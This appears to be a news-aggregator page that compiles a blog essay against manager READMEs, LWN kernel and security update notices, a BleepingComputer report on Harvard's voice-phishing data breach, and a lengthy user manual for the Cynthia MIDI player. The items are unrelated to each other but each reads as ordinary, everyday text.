Several years ago, I published a critique of manager READMEs that succeeded in stirring up a lot of feelings, pro and con. I’d like to believe it prompted some people to reconsider whether these are actually effective tools.Today, I want to revisit this. Not to encourage you to write a manager READM...
Several years ago, I published a critique of
manager READMEs
that succeeded in stirring up a lot of feelings, pro and con. I’d like to believe it prompted some people to reconsider whether these are actually effective tools.
Today, I want to revisit this. Not to encourage you to write a manager README, but to suggest other ways forward that I have learned in the years since writing the first post.
The Problem
When you become a senior manager or an executive, you face new challenges. Your job involves directing work across many people with different approaches, styles, and opinions. Left to their own devices, each person will develop a slightly different way of communicating with you, one that works for them and that they believe works for you.
With a broad scope of work to oversee, you need to quickly grasp what matters and should be shared upward, outward, and down into different parts of your organization. Now, at most companies, this is a known problem and inevitably someone has already tried to solve it by means of standardized tooling and reporting. Everyone uses Jira for a reason and it’s not that Jira is the best tool ever, but it is malleable to many types of standardization. Companies implement OKR tools and Tableau dashboards, they institute various program management processes, they run quarterly business reviews, and all of these are done in the name of standardizing the information that is passed upward and outward so that people can make better decisions.
Unfortunately, this is typically the lowest common denominator of usefulness to any senior manager. Reporting generated in this way obscures as much as it reveals, and it rarely addresses the things that you really care about¹. So senior managers need other mechanisms for imparting what they want to hear about and see. The README can sometimes be an attempt to impart that cultural overlay: a way of saying, “I care about X, and want you to focus on that when you communicate to me; I don’t care much about Y and Z, and by the way, it’s best if you communicate with me in these ways.”
I remain steadfast that this is not a good approach. It creates a focus on you as the person to be managed up to. Your personality must be accommodated, your preferences honored. I get the desire for this, and I’m certainly not immune to being managed up to, but my preference is to avoid major blind spots. I want to hear what I care about, yes, but I don’t want to live in an information bubble either.
READMEs are also rather lazy. There’s a kernel of truth in their purpose: we want people to focus certain types of communication on what we believe is most valuable. However, doing it in the form of a general README isn’t actually the most effective approach.
So if not READMEs, what then?
The Solution: Appropriate Templates and Ceremonies
Instead of one doc that attempts to communicate all of your preferences and warts and creates a you-focused mindset, it’s time to level up and recognize that a big part of the job of senior/executive management is setting standards for doing certain types of work. The best way to set those standards, in my experience, is lightweight templates and ceremonies for information sharing, discussion, and decision-making.
I think that every good senior manager should have some toolkit of these. You aren’t just going to operate against the lowest common denominator of pre-existing reports and processes in your company, you have to establish a few processes that exist to show what you care about and where you want the organization to focus. One of mine is Wins and Challenges (discussed in my
recent book
), which I’ve brought from startups to giant teams and everything in-between. Is it extra work on top of whatever people might be doing in Jira or other tools? Possibly. Does it create far more valuable conversation across my leadership team than those tools? Yes. Does it help me specifically understand things and do my job better? Absolutely.
There is a very lightweight template to follow for my Wins and Challenges, and the process details are owned by the team gathering the information (although I specify opinions about how it should be done, I only check the outcomes). I find that the best templates and processes are lightweight in a way that they show what information should be collected but don’t dictate exactly the process to collect that information.
Developing templates that expose the right useful information is hard. You will both over-do and under-do this as you’re figuring it out, whether it’s your first time in the job, you’ve moved to a different company or team, or your team has just evolved past the usefulness of the old methods. My advice is to start simple and add on new details or processes only when it’s clear you have a widespread gap. A good rhythm for a new job/team is to learn for 90 days, then introduce what you need, and evolve from there with enough time to learn from each iteration (usually, 1-2 quarters).
Don’t Try To Template/Processify Everything
I recently asked an experienced CPO about good product processes, and what they looked like from his perspective. One piece of advice was that not everything should have a fixed process or template. When you need to leave room for discussion, it’s often best to limit the structure; a walkthrough of a prototype might be better done as an open-ended exploration and discussion rather than a formal set of steps.
It’s important not to give into the temptation (or external pressure) to create processes for everything. I personally do not have a fixed format for my 1-1s, and dislike even the expectation of coming with a set of written and shared topics. I don’t want to feel rushed to finish everything on an agenda, and the temptation to immediately jump to conclusions about a topic based on an agenda item often increases miscommunication. Sometimes there’s a need to pre-read and prepare, but sometimes we just need to talk and see where the exploration of current top-of-mind concerns and information takes us.
So, senior leaders, you can tell people how you want them to work with you, but don’t do it via the crude mechanism of a manager README. Drive clarity through templates and processes where needed, resist the urge to create them everywhere, and lead your organization by showing them where to spend their time and focus as a collective good, not just good for you.
¹ Think of it this way, if you could easily see the problems via the pre-existing dashboards, they’d already be on their way to being solved. Dashboards are like alerts and tests in this way, they tend to catch what you know could go wrong, but rarely the surprise problems that lead to big incidents. Necessary, but insufficient.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.
Three stable kernel updates, two french hens, ...
Linux Weekly News
lwn.net
2025-11-24 14:11:01
Greg Kroah-Hartman has announced the release of the
6.17.9,
6.12.59, and
6.6.117 stable kernels. As usual, he advises
users of stable kernels to upgrade.
...
Greg Kroah-Hartman has announced the release of the
6.17.9
,
6.12.59
, and
6.6.117
stable kernels. As usual, he advises
users of stable kernels to upgrade.
Harvard University discloses data breach affecting alumni, donors
Bleeping Computer
www.bleepingcomputer.com
2025-11-24 14:06:36
Harvard University disclosed over the weekend that its Alumni Affairs and Development systems were compromised in a voice phishing attack, exposing the personal information of students, alumni, donors, staff, and faculty members. [...]...
Harvard University disclosed over the weekend that its Alumni Affairs and Development systems were compromised in a voice phishing attack, exposing the personal information of students, alumni, donors, staff, and faculty members.
The exposed data includes email addresses, telephone numbers, home and business addresses, event attendance records, donation details, and "biographical information pertaining to University fundraising and alumni engagement activities."
However, according to Klara Jelinkova, Harvard's Vice President and University Chief Information Officer, and Jim Husson, the university's Vice President for Alumni Affairs and Development, the compromised IT systems didn't contain Social Security numbers, passwords, payment card information, or financial info.
Harvard officials believe that the following groups and individuals had their data exposed in the data breach:
Alumni
Alumni spouses, partners, and widows/widowers of alumni
Donors to Harvard University
Parents of current and former students
Some current students
Some faculty and staff
The private Ivy League research university is working with law enforcement and third-party cybersecurity experts to investigate the incident, and it has sent data breach notifications on November 22nd to individuals whose information may have been accessed in the attack.
"On Tuesday, November 18, 2025, Harvard University discovered that information systems used by Alumni Affairs and Development were accessed by an unauthorized party as a result of a phone-based phishing attack,"
the letters warn
.
"The University acted immediately to remove the attacker's access to our systems and prevent further unauthorized access. We are writing to make you aware that information about you may have been accessed and so you can be alert for any unusual communications that purport to come from the University."
The university also urged potentially affected individuals to be suspicious of calls, text messages, or emails claiming to be from the university, particularly those requesting password resets or sensitive information (e.g., passwords, Social Security numbers, or bank information).
A Harvard spokesperson was not immediately available for comment when contacted by BleepingComputer earlier today.
In mid-October, Harvard University also told BleepingComputer that it
was investigating another data breach
after the Clop ransomware gang added it to its data-leak extortion site, claiming it had breached the school's systems using a zero-day vulnerability in Oracle's E-Business Suite servers.
Two other Ivy League schools,
Princeton University
and the
University of Pennsylvania
, disclosed data breaches earlier this month, both confirming that attackers gained access to donors' information.
As MCP (Model Context Protocol) becomes the standard for connecting LLMs to tools and data, security teams are moving fast to keep these new services safe.
This free cheat sheet outlines 7 best practices you can start using today.
Security updates for Monday
Linux Weekly News
lwn.net
2025-11-24 14:05:35
Security updates have been issued by Fedora (calibre, chromium, cri-o1.32, cri-o1.33, cri-o1.34, dotnet10.0, dovecot, gnutls, gopass, gopass-hibp, gopass-jsonapi, kubernetes1.31, kubernetes1.32, kubernetes1.33, kubernetes1.34, and linux-firmware), Mageia (ffmpeg, kernel, kmod-xtables-addons & km...
Reliably play midi music files from a
folder or ".m3u"
play list. Adjust playback speed, volume and output device on-the-fly during playback. A large playback progress bar makes jumping forward and backward in time a breeze with just a single click or tap. Supports ".mid", ".midi" and ".rmi" files in format 0 (single track) and format 1 (multi-track). Comes complete with 25 sample midis ready to play.
Cynthia playing through her sample midi music
Features
Dual play systems -
Play Folder and
Play List
Comes with 25 built-in sample midis on a virtual disk
Elapsed, Remaining and Total time readouts
Device Status, Device Count, Msgs/sec and Data Rate readouts
Native ".m3u" playlist support (copy, paste, open, save, build)
Drag and drop midi files to play/add to playlist
Play Modes: Once, Repeat One, Repeat All, All Once, Random
Standard Play Speed Range: 50% to 200% (0.5x to 2x)
Extended Play Speed Range: 10% to 1,000% (0.1x to 10x)
Intro Mode: Play first 2s, 5s, 10s or 30s of midi
Rewind/Fast Forward by: 1s, 2s, 5s, 10s or 30s
Play on Start option - playback commences on app start
Always on Midi option - maintain connection to midi device(s) for instant playback
Auto Fade In - eliminate loud or abrupt notes during rewind, fast forward or reposition operations
Playback Progress bar - click to reposition/jump backward or forward in time
Volume control with volume boost (up to 200%)
"
Mixer" link - display Windows "Volume Mixer" app
Play ".mid", ".midi" and ".rmi" midi files in 0 and 1 formats
Scrolling lyrics viewer
Detailed midi information panel
Tracks Panel: Realtime track data indicators, display flat or shaded, with mute all, unmute all, and mute individual track options
Channels Panel: Realtime channel output volume indicators with peak level hold and variable hold time, display flat or shaded, unmute all, mute all, and mute individual channel options
Mixer: Adjust individual channel volume levels from 0% to 200%
Option: Number channels 0-15 or 1-16
Notes Panel: 128 realtime note usage indicators with variable hold time, 8-12 notes per line, labels as letters or numbers, display flat or shaded, unmute all, mute all, and mute individual note options
Option: Number notes 0-127 or 1-128
Piano Panel: View realtime piano keystrokes on a 128, 88, 76, 61, 54, 49 or 37 key keyboard
Piano Keystroke Illumination: Off, Flat, Shade Up, Shade Down, Subtle, Subtle 2, Leading Edge, and Leading Edge 2
Piano: Mark middle C key, C + F keys, or all white keys
Volume Bars: Realtime average volume and bass volume levels (left and right vertical)
Transpose option: Shift all notes up/down music scale
Use an Xbox Controller to control Cynthia's main functions: Playback speed, volume, song position, display panels, song file navigation, jump to start of song, toggle fullscreen mode, etc
Large list capacity for handling thousands of midi files
Switch between up to 10 midi playback devices
Supports playback through a single midi device, or multiple simultaneous midi devices
Multi-Device Options (per midi device): Time Shift - adjust playback timing to compensate for midi device lag from -500 ms to +500 ms, Device Volume - adjust output volume from 0% to 200%, Output Channels - select which midi channels to play through the device
Automatic Midi Device(s) Resync - detects OS changes in midi device ordering/names and corrects in realtime
Custom built midi playback engine for high playback stability
Automatic compact mode for display on small/low resolution screens
Simple and easy to use
Options Window - Easily change app color, font, and settings
Portable
Smart Source Code (Borland Delphi 3 and Lazarus 2)
Realtime display panels Visual (Tracks, Channels, and Notes), Piano and Bars visible
Cynthia in her traditional view - Navigation, Information and Settings panels visible
Easily adjust channel volumes on-the-fly with the integrated mixer - hover over/tap the Channels panel to show/edit
Cynthia in the "Deep Orange 2" color scheme (Options > Color) and "Swell" animated background scheme (Options > Background), with Compact mode on (Options > Settings > Compact)
Running Cynthia for the first time
Several sample midis built-in. When starting Cynthia for the first time, these sample midis are listed in the "
Play Folder" panel, and playback is automatic.
At any point during playback, you may select another midi from the list. Playback seamlessly switches to the selected midi in question.
Cynthia supports realtime changes to settings during playback. This means you may adjust the Playback Mode, Playback Device, Volume and Speed without having to stop/restart playback.
⏶
Main toolbar links and their function
The main toolbar is located near the top of Cynthia's window. From left to right, it has the links of:
Nav - Toggle display of navigation panel
Play Folder - Show the "Play Folder" panel to play midis from a folder
Play List - Show the "Play List" panel to play midis from a playlist
Prev - Play previous midi file in list
Rewind - Shift playback position back several seconds
Stop - Stop playback
Play - Toggle playback: When playing (
flashing) playback stops/when stopped (
static) playback starts
Fast Forward - Shift playback position forward several seconds
Next - Play next midi file in list
Menu - Show menu
Mixer - Show the Windows Mixer app
Options - Show the Options window, to change Cynthia's appearance
Help - Show (from rightmost column) or hide built-in help
⏶
How to play a list of midis in a folder
From the main toolbar click "
Play Folder" link (top left) to display the "Play Folder" panel.
With
Play Folder, there is no need for a playlist or setup. Just navigate to the folder in question and instantly play the midis within.
Double click the "
Home" entry at top of list (scroll up if not visible). The list will refresh with the names of your hard drives, pen sticks and other local storage devices. Double click a drive, then the subsequent folder(s) to the one that you want to play.
The list will update. Double click a specific midi to begin playback, or, click the "
Play" link.
Toolbar Links
Refresh - Refresh the playback list
Fav - Show the "Favourites" window. Use this handy window to maintain a list of your favourite folders for quick access.
Back - Go to the previous folder in navigation history
Forward - Go to the next folder in navigation history
Tips
:
There is no need to stop playback before switching to another folder. Double click the new folder and wait several seconds for Cynthia to automatically recommence playback.
The current folder will be remembered when Cynthia is restarted.
⏶
How to use a playlist to play a selection of midis
The standard ".m3u" playlist format is supported. This is a plain text file that contains the length of the midi in seconds, a title, and the location of each midi.
Cynthia supports midi playback from local storage devices, such as hard disks, pen sticks etc. Internet urls are not supported.
If you already have a playlist in the m3u format saved on your disk, you can open it in Cynthia for playback. From the main toolbar click the "
Play List" link (top left) to show the Play List panel. An additional toolbar presents. Click the "
Open" link (if shown) or "
Edit >
Open". From the Open window, navigate to your playlist, select and click the "Open" button.
The contents of your playlist will load inside the
Play List panel. Click the "
Play" link to begin playback.
⏶
How to make a playlist
There are several ways a playlist can be constructed. The first method is the easiest. From your computer explorer ("File Explorer" in Windows and "Files" in Ubuntu) navigate to the folder of midis. Highlight one or more midis files inside the folder and drag the selection onto Cynthia and let go of the mouse button. The "
Play List" panel updates and displays the dropped midi files appended, to the list. Repeat this process for as many midi files as required.
At anytime you may save the playlist. From the Play List toolbar, click the "
Save As" link (if shown) or "
Edit >
Save As...". Type a name in the Save window and click the "Save" button to save the playlist.
It is worth noting that each time Cynthia saves your playlist to file, the midi files referenced inside it have their names adjusted automatically to work with the specific save location of the playlist.
Most midi filenames in a playlist are relative, as they do not have the full drive, folder and filename, but rather a partial folder structure and the midi's name. This is to permit the movement of the midis and the playlist from one location to another without the need for the playlist to be specifically rewritten.
If you are curious at what the playlist format looks like, click the "
Copy All" link (if shown) or "
Edit >
Copy All" to copy the entire playlist to Clipboard. Note Cynthia will use a full filename for each listed midi file, since the Clipboard cannot be referenced from a disk location. You may paste it into any text editor to view, modify, or rearrange the order of the midi files listed.
To paste an altered playlist back into Cynthia, click the "
Replace" link (if shown) or "
Edit >
Replace". The Play List panel will update.
Cynthia has support for extended playlists. Note! A large playlist of 100,000+ midi files will use about 102MB of RAM and require a second or two to apply midi filename adjustments.
Support for playlist filtering is provided. An example: You may instruct Cynthia to list only ".mid" files by deselecting ".midi" and ".rmi" options from the "File Types" option panel (right column). The playlist itself remains unchanged - how Cynthia uses it changes.
Toolbar Links
Edit - Show edit menu
New - Prompt to clear playlist
Open - Open a playlist from file
Save As - Save playlist to file
Cut - Cut selected playlist item to Clipboard
Copy - Copy selected playlist item to Clipboard
Copy All - Copy entire playlist to Clipboard
Paste - Add Clipboard playlist to end of current playlist
Replace - Replace current playlist with Clipboard playlist
Undo - Undo last change to playlist
Tips
:
The current playlist is remembered for next time Cynthia is started.
To show or hide the above toolbar links, tick or untick the "
Edit > Show Links on Toolbar" option. Unticking the option hides all links except "
Edit" and "
Paste".
⏶
Which playback method to use? Play Folder or Play List?
If you're a lover of simplicity itself, wishing only to play midi files directly from your hard drive folders as is, or, you're a playlist fan, rest assured, switching between these two very different playback systems, is as easy as a single click on either the "
Play Folder" or "
Play List" links.
Whilst the Play Folder method is limited to playing only the files contained in the currently selected folder, there is zero setup, no list to be built, and playback can start without hassle.
The Play List method on the other hand allows for a far more in depth custom playback experience. It supports the playback of midis across multiple disk drives, folders and in any assembled order.
Additionally, Cynthia's large capacity list can easily handle a very large playlist. For example a playlist of 10,000+ midis is just fine.
And switching between these two playback methods can be done during playback without issue.
Tip
:
The playback options File Types, Playback Mode, Playback Device, Speed and Volume are shared between both playback systems, and do not change or require adjustment after a switch.
⏶
Option: Playback Mode
Located bottom of left column.
Playback mode (bottom left) determines how Cynthia plays the list of midis in the
Play Folder or
Play List panel (left column).
Once
Play currently selected midi to the end, and stop playback.
Repeat One
Repeat the currently selected midi without stopping playback.
Repeat All
Play each midi in turn, working down the list (left column), then restart from the top. Playback initially starts at currently selected midi.
All Once
Each midi in the list is played working downward through the list. Playback stops at the end of the last midi.
Random
Continuously play a midi, selecting each new one randomly from the list.
⏶
Option: File Types
Located towards bottom of right column.
There are three midi file types supported: ".mid", ".midi" and ".rmi". The first two are identical file formats, only the file extension differs. The third format, ".rmi", is slightly different and contains additional multimedia information for Microsoft Windows.
By default all three file types are selected (lit black). In this state, all playable midi files are listed in the Play Folder and Play List panels.
To restrict the file types to be played back, click the file type to deselect it. The list of midis (left column) updates to reflect the change.
If all three options are deselected, Cynthia interprets this as if all three were selected.
⏶
Option: Playback Device
Located towards bottom of right column.
By default all midi playback is sent to the Windows Midi Mapper system - the default Windows midi note handler.
If you have more than one midi device installed on your computer, Cynthia can redirect the midi notes to that device instead.
Traditionally, a midi device had been considered to be hardware. But now, with the advent of powerful computer hardware, software can now act as virtual hardware, allowing for advanced features to be included on your computer without the need for hardware upgrades or physical adjustment.
A midi software driver can support a soundfont, which can greatly enhances the playback quality of a midi through it's support for large, high-quality, instrumental sound libraries.
To change the playback device, select a number in the playback device control (bottom right). Up to ten devices (1-10) is supported. "Map" is the Windows Midi Mapper. Selecting a dash will cause playback to stop producing audible sound (no device selected for sound output). In this case, the last usable (numbered) midi device will be automatically selected after a short time delay, recommencing audible playback without the need for user input.
Cynthia supports realtime device switching during playback. A small, momentary interruption to playback may occur during a device change. The name of the device in use by Cynthia is listed in the playback device control (bottom right), for example as "Playback Device: Midi Mapper". In later versions of Microsoft Windows the Midi Mapper was discontinued - in this case, Cynthia uses the first installed midi device.
It is worth noting that using another device may require a separate adjustment to that device's volume control, some devices do, and some do not. If it does have a volume control, it is more than likely to be accessible via Windows "Volume Mixer" application. Click the "
Mixer" link from the top toolbar to display the application and adjust the volume control of your device accordingly.
⏶
Option: Speed
Located towards bottom of right column.
By default, Cynthia plays back a midi at normal speed (100%). Drag the slider to the right to increase the playback speed up to a maximum speed of 1,000% or 10x normal speed.
To slow down playback speed, drag the slider to the left. A value less than 100% slows playback to less than normal speed. The slider can go as low as 10% or 1/10th normal playback speed.
Playback speed may be adjusted at any point during playback. All changes take place in realtime. An auto-fade in feature momentarily quietens playback to avoid any sudden or unexpected notes.
⏶
Option: Volume
Located at bottom of right column.
For maximum compatibility between different operating systems and device types (hardware and software) and their capabilities, Cynthia employs a multi-layer volume control system which adjusts both hardware and midi note volumes.
To adjust playback volume, position the slider to the right to increase the volume and to the left to decrease it.
An increase above 100% boosts the midi volume, making low-level, hard to hear midis, more discernable.
⏶
Option: Playback Progress
Adjust playback position with a single click or tap. Additionally, hovering a mouse cursor over the Playback Progress bar displays a vertical marker for the new playback time and position. Click to apply new position. The midi playback will shift to a new position and automatic fade in eases back playback volume to avoid sudden clicks, pops or abrupt notes.
Use keyboard arrow keys to progressively move forward or backward through the midi. A vertical marker will display.
Not currently playing? Click in the Playback Progress bar to commence playback at that position.
⏶
Lyrics
Synchronised lyric display is supported for midis with lyrics.
To enable lyrics, from the main toolbar click the "
Menu" link and tick "Show Lyrics".
When included within a midi, lyrics are displayed inside the Playback Progress bar (bottom of Cynthia) as "Playback Progress - Lyrics:" with several words or part words visible at any one time.
A midi without lyrics will display "Playback Progress".
If hyphenated lyrics are required in order to highlight the pauses between part-words, from main toolbar click the "
Menu" link and tick "Hyphenate Lyrics".
⏶
Always on Midi
Sometimes there can be a short, noticeable playback delay when commencing playback, initially. This delay is preparation time for Cynthia to ready playback.
There is no delay switching between midis during playback as Cynthia remains connected to the midi device. By default, after a short period of no playback (5 seconds or more), the midi device will switch to offline, and a short delay will occur when playback is next started.
To avoid this delay, the "Always on Midi" option may be used to keep a midi device online, even when Cynthia is not playing. From the main toolbar click the "
Menu" option and tick the "Always on Midi" option.
Tip
:
You can always tell if the midi device is online or not - from the "Midi Information" panel on the right. Look for the item called "Device" in the "Technical list". This will either be "Online" or "Offline".
⏶
What midi formats are supported?
Midis comes in various format types. The simplest is format 0, a single track format, that stores all it's tempo (speed), notes and commands on a single, mixed track.
A format 1 midi, on the other hand, uses a dedicated master track (first track) to store all of it's tempo (speed) commands for the entire midi. Notes and commands are stored separately on additional, multiple tracks.
Cynthia supports both format 0 and format 1 midis with file extension ".mid", ".midi" and ".rmi".
A third, format 2 midi exists. This format type is not supported by Cynthia. In addition, Cynthia does not support system exclusive messages. These messages will be ignored, and typically relate to manufacturer specific equipment.
⏶
Using an Xbox Controller to control Cynthia
Cynthia must be setup to use an Xbox Controller. From the top toolbar select "Menu > Xbox Controller" and select the "Active Only" or "Active and Inactive" option. Pair an Xbox Controller to your computer (if not already done). Cynthia automatically detects and uses active Xbox Controllers. More than one controller can be used at the same time.
1. Left joystick - left/right to adjust volume, push down to toggle between Play Folder and Play List modes
2. D-pad - left/right to switch midi playback device, up/down to switch between songs in navigation panel
3. View button - Go to beginning of song
4. Share button - Not used
5. Menu button - Toggle through playback modes: Once, Repeat One, Repeat All, All Once, and Random
6. Right joystick - left/right to change song playback position, push down to toggle full screen mode
7. Left bumper (top) - toggle display of navigation and piano panels
8. Right bumper (top) - toggle display of midi information and tracks, channels, and notes combination panels
9. Left trigger (bottom) - reduce playback speed
10. Right trigger (bottom) - increase playback speed
11. X button - reset playback speed to 100%
11. Y button - reset volume to 100%
11. B button - start/stop playback
11. A button - select folder in navigation panel (when in Play Folder mode)
⏶
Change the coloring of the app's GUI
From top toolbar click "
Options" or app menu "... > Options" (top right of window). An "Options" window will display. Select "
Color" tab to show list of color schemes.
The "Color Schemes" list is split into three sections:
1. Built-In color schemes - read only/use as is
2. Custom color schemes - user customisable and labelled Custom 1-10
3. Saved color schemes - user customisable and saved as file(s) on disk
There are 160+ built-in color schemes to choose from. Simply select a color scheme to apply in realtime. For instance, Aqua Marine. Watch as the app's GUI changes color instantly - no need for an additional load, apply, or set.
A Blaiz Enterprises' color scheme (*.bcs) at its core is a list of twenty colors, responsible for coloring most aspects of the app's GUI. Some specialised colors are derived automatically from these. Two colors for the frame, nine for important areas, Title colors, and nine more for common zones, Standard colors.
Each built-in color scheme has it's own unique set of colors. A custom color scheme allows for colors to be customised. To create a custom color scheme, scroll down the list to the section titled "Custom". He you'll find ten custom color scheme slots - each fully customisable in realtime without any need to be named, saved or applied. Tap or click on a slot to start - for example slot 1 - "Custom 1".
On the right a series of editable color palettes will appear. Click a palette to display the color dialog window. Adjust color as desired and click OK when done. Alternatively, click and drag your mouse cursor/fingertip from the color palette to acquire color from your computer screen in realtime. App GUI continuously updates to reflect changes in color. All changes are automatically saved.
⏶
Give your new color scheme a name
Want your shiny new color scheme to have its own name? Easy. From the color schemes list - click "Options > Color" to display dialog - scroll down to the "Custom" section, select your custom color scheme, and click "
Menu >
Save As...". Type a name and click the "Save" button. Your color scheme is saved to disk and listed under the "Saved" section of the color schemes list - next section down.
Any color scheme can be saved to disk, and then edited. For instance, you can select one of the built-in color schemes, such as Aqua Marine, and save it to disk, then customise as desired.
⏶
How to use your named color scheme
Click "Options > Color" to show the color schemes list. Scroll down to the last section named "Saved". This section presents a list of all your saved color schemes in one central location. Select a scheme to use.
⏶
Can I edit my saved color scheme without having to re-save it/load it etc?
Yes. Any saved color scheme can be customised without fuss. Click "Options > Color" and scroll down to the section named "Saved", click the color scheme you wish to edit, and adjust the color(s) as desired. All changes are saved automatically back to the file on disk, without any need to explicitly save.
⏶
What is a background scheme
A background scheme is a static or animated image tiled across the background layer of the app. The app's GUI components sit above this layer/merge into it, such as toolbars, tool images, buttons, text etc. There are 60 built-in background schemes, based on several images with different presets, like horizontal and vertical scroll speeds, fade in and out rates, and wobble levels. These functions allow for a static image to give movement to the app. While some background schemes are specially set for animation, others are not.
The background image can be rendered in full color, or shade-shifted toward greyscale, or shade-shifted toward the app's current highlight color. One slider, Colorise, controls this tri-function.
A background scheme supports a maximum image color depth of 32 bits in RGBA format - 8 bit red, green, blue, and alpha channels - for instance a transparent PNG image.
Note
:
An animated background scheme can operate at frame rates of up to 20 fps (frames per second), which means the entire GUI of the app is repainted in full, 20 times per second, like a video, and therefore can consume quite a bit of CPU power, especially at high resolutions. It is recommended a modern, powerful machine be used for high frame rates/resolutions in order to maintain smooth operation of the GUI.
Sliders and their meanings
:
Strength (0..255):
Determines how much of the background image is seen/made visible. A low value renders the background subtly beneath the GUI, whereas a high value, 100-255, renders it boldly. A value above 100 is disabled by default. To enable, click "Options > Settings" and deselect "Display > Safe Background". A value over 100 may overpower the GUI making it hard to navigate or operate. If this becomes the case, press the "F2" key, and then the Enter key to confirm restoration of the app's default settings.
Colorise (-100..100):
Set the color rendering method. A value of 100 renders the background image in full color, a value of 0 in greyscale, and a value of -100 in the app's current highlight color.
Speed (0..20):
Paint speed in frames per second. 0 is static - the background scheme only repaints when required. This is the least stressful option. A value of 1-20 sets a constant repaint cycle of 1-20 fps (frames per second).
Horizontal Scroll/Vertical Scroll (-100..100):
Moves background image left/up (minus value) or right/down (plus value) by X pixels. A value of zero turns movement off.
Horizontal Wobble/Vertical Wobble (0..300):
Applies a wobble factor to the above Horizontal Scroll/Vertical Scroll movement(s).
Fade In/Out (0..50):
Cycles through a high-to-low-to-high intensity flow, gradually fading the background image from view, then back again, in a continuous cycle. Use a low value for a slow cycle, and a high value for a fast cycle.
Fade Wobble (0..200):
Applies a wobble factor to the Fade In/Out flow cycle above.
⏶
Can I customise a background scheme/background image
Yes you can. There are 10 custom background scheme slots. Click "Options > Background" and scroll down to the section named "Custom". For instance, click on "Custom 1". A sub-toolbar will display in the right column at the top. From there, you can paste in an image from Clipboard - click "Paste", or open an image from file - click "File".
For best visual results, your image should be a similar size to the app's overall area, and be prepped for tiling work - that is, have it's right and bottom edges modified so that its colors/pixels seamlessly wrap back round to its opposing edge (right-to-left and top-to-bottom). You can use a tile creation app, or a good quality graphics app to accomplish this, or use our "Blend It" app to prep your image.
Without this, tiling the image may present abrupt edges of unwanted opposing lines of horizontal/vertical colors, and be visually jarring in nature.
Adjust the sliders as required to accomplish animation and visual effects. All changes to the image and sliders are saved in realtime.
⏶
How do I change the frame style, size and sparkle strength/effect?
The frame on our apps have a long history reaching back to the late 1990s, where they first adorned our FastCards and PowerCards (still/animated electronic musical greeting cards).
In the context of an app, they primarily serve as a large, easy-grip area for resizing the app's overall size, and a touch of decoration to boot.
A frame can be made wide or narrow as required. The modern app has a typical frame width of 7 px in a plain style, so as not to distract or occupy excessive screen real estate.
Furthermore, a frame may render with an optional, randomised sparkle effect, with a range of 0 (no sparkle) to 20 (heavy sparkle).
Click "Options > Frame" to edit the app's current frame settings. A list of 50 built-in frames is available to choose from, ranging from Antique to Traditional 5.
Toward the bottom of the window are two sliders to adjust the frame's Sparkle (strength) and Size (width in pixels). A frame can be sized from 0 px (no frame) up to a wide frame of 72 px. All changes update in realtime.
⏶
Automatic zoom and scaling of app text and images on high resolution displays
Click "Options > Font" to display zoom and font specific settings. By default, the app is set to automatic zoom, which means it will scale up its text and images if the monitor it's displayed on is above 2K in resolution.
Why scale text and images at all? What is special about 4K and 8K monitors? At first glance it may not be obvious the significant difference between standard 2K resolution, and the much higher 4K and 8K resolutions.
But high resolution monitors, such as 4K and 8K displays have far more pixels (colored dots) per inch on screen than previous generations of monitors, that is, the screen size may be the same but more dots are packed into the same area. Consequently, an app without scaling abilities may appear small or even blurred on these monitors. That's because as new monitors and TVs gain ever greater resolutions, statically sized apps shrink in size/fail to compensate. This is why a modern app must be able to scale up to match the appropriate resolution.
Here is a comparison of common display resolutions:
2K = 1920w x 1080h = 2,073,600 pixels
4K = 3840w x 2160h = 8,294,400 pixels
8K = 7680w x 4320h = 33,177,600 pixels
A 4K (ultra high definition) monitor uses four times (4x) more pixels than it's 2K (full high definition) counterpart. A statically built app without scaling would shrink to 50% of it's size, making it difficult to use. An operating system may attempt to counter this by scaling it up using pixel stretching - very much like zooming up a photo - unfortunately this tends to blur the appearance of the app.
The same app on an 8K monitor would suffer even greater shrinkage, rendering at only a quarter (25%) of it's original size, or scaling with significant blurring.
This app has a built-in zoom mode, which multiples the width and height of its text and images by a factor of 2, 3, or 4, dependant on the resolution of the display. This does away for the need of the operating system to stretch/scale its pixels.
On a 2K monitor there is no need to scale as this is the app's intended resolution. On a 4K monitor the app switches to a zoom factor of 200% (2x), upscaling text and images and the main window's dimension accordingly, and 400% (4x) on an 8K monitor. The end result is an app that appears appropriately sized over different monitor resolutions.
You can override this automatic zoom function, and set your own zoom value of: 100%, 200%, 300%, or 400%, if desired. An option that may be useful on a custom display resolution, and/or multiple monitor display environment.
Note
:
Setting the zoom value to 300% or above on a 2K monitor may render the app so large as to make it unusable. If this occurs, you can press the "F2" key at anytime to restore the app's default settings.
⏶
Change app text size
The text size (font size) can be set between 6 and 24. Click "Options > Font" and choose a size option. Any change updates the app text in realtime.
In some instances, the app may display slightly larger or smaller text in special areas, however this text is directly scaled from the size set.
By default the app uses a size of 10.
Note
:
Not all sizes are supported by all fonts. On Ubuntu for instance, a large font size for Arial can cause text to appear weird or slightly off. If this occurs, try reducing the font size a tad, or alternatively select another font (font name).
⏶
Change app font
A font determines what sort of characters appear on the screen, and in what style. Click "Options > Font" and choose a font name (font) from the list of options, from Arial to DejaVu Serif. Any change updates the app in realtime.
Older fonts like "System" were simple formats constructed from small images or bitmaps, one per character, and did not scale up very well, partly because to save on memory, not all character sizes were stored inside the font. Today, modern fonts use mathematical vectoring to draw shapes and lines etc to construct characters on the screen, though the infrastructure and overhead required for such fonts can be complex and heavy on a computer system. But because these fonts employ mathematics to draw their characters, they do scale up well.
Eleven common font name options are presented for best compatibility and visual appearance, taking into consideration operating systems as old as Window 95, through to modern-day Windows 11, and other systems such as Mac and Linux.
In general, you want a font that is widely supported and guaranteed to render well on most computers. Bearing that in mind, Arial, is a good choice, as it is widely supported by operating systems going as far back as Windows 95, if not further.
If a font name is selected but is not supported by the current computer, for example "DejaVu Sans" - not supported by Windows 95 - a close approximate/fallback font is used instead.
For a specific/custom font, click the "Custom" option once to switch it on, and click it again to display a Font dialog. Choose the font name from the list of fonts and click the "OK" button when done.
If the app becomes unreadable, or hard to read after choosing a new font name - it can happen with a bad font, a foreign language font, or a symbols only font like "Wingdings" - press the "F2" key to restore the app's default settings.
⏶
Change app font feathering/antialiasing
For maximum font compatibility, two completely separate methods have been employed to render text with antialiasing.
Click "Options > Font" for font settings.
